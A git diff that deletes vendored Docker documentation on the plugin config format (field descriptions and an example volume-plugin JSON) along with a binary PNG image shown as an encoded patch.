"application/vnd.docker.plugin.v1+json" - - -## *Config* Field Descriptions - -Config provides the base accessible fields for working with V0 plugin format - in the registry. - -- **`description`** *string* - - description of the plugin - -- **`documentation`** *string* - - link to the documentation about the plugin - -- **`interface`** *PluginInterface* - - interface implemented by the plugins, struct consisting of the following fields - - - **`types`** *string array* - - types indicate what interface(s) the plugin currently implements. - - currently supported: - - - **docker.volumedriver/1.0** - - - **docker.authz/1.0** - - - **`socket`** *string* - - socket is the name of the socket the engine should use to communicate with the plugins. - the socket will be created in `/run/docker/plugins`. - - -- **`entrypoint`** *string array* - - entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint) - -- **`workdir`** *string* - - workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir) - -- **`network`** *PluginNetwork* - - network of the plugin, struct consisting of the following fields - - - **`type`** *string* - - network type. - - currently supported: - - - **bridge** - - **host** - - **none** - -- **`mounts`** *PluginMount array* - - mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts) - - - **`name`** *string* - - name of the mount. - - - **`description`** *string* - - description of the mount. - - - **`source`** *string* - - source of the mount. - - - **`destination`** *string* - - destination of the mount. - - - **`type`** *string* - - mount type. - - - **`options`** *string array* - - options of the mount. - -- **`propagatedMount`** *string* - - path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins. - This path will be bind-mounted outisde of the plugin rootfs so it's contents - are preserved on upgrade. - -- **`env`** *PluginEnv array* - - env of the plugin, struct consisting of the following fields - - - **`name`** *string* - - name of the env. - - - **`description`** *string* - - description of the env. - - - **`value`** *string* - - value of the env. - -- **`args`** *PluginArgs* - - args of the plugin, struct consisting of the following fields - - - **`name`** *string* - - name of the args. - - - **`description`** *string* - - description of the args. - - - **`value`** *string array* - - values of the args. - -- **`linux`** *PluginLinux* - - - **`capabilities`** *string array* - - capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security) - - - **`allowAllDevices`** *boolean* - - If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host. - - - **`devices`** *PluginDevice array* - - device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices) - - - **`name`** *string* - - name of the device. - - - **`description`** *string* - - description of the device. - - - **`path`** *string* - - path of the device. - -## Example Config - -*Example showing the 'tiborvass/sample-volume-plugin' plugin config.* - -```json -{ - "Args": { - "Description": "", - "Name": "", - "Settable": null, - "Value": null - }, - "Description": "A sample volume plugin for Docker", - "Documentation": "https://docs.docker.com/engine/extend/plugins/", - "Entrypoint": [ - "/usr/bin/sample-volume-plugin", - "/data" - ], - "Env": [ - { - "Description": "", - "Name": "DEBUG", - "Settable": [ - "value" - ], - "Value": "0" - } - ], - "Interface": { - "Socket": "plugin.sock", - "Types": [ - "docker.volumedriver/1.0" - ] - }, - "Linux": { - "Capabilities": null, - "AllowAllDevices": false, - "Devices": null - }, - "Mounts": null, - "Network": { - "Type": "" - }, - "PropagatedMount": "/data", - "User": {}, - "Workdir": "" -} -``` diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png deleted file mode 100644 index 1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 45916 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 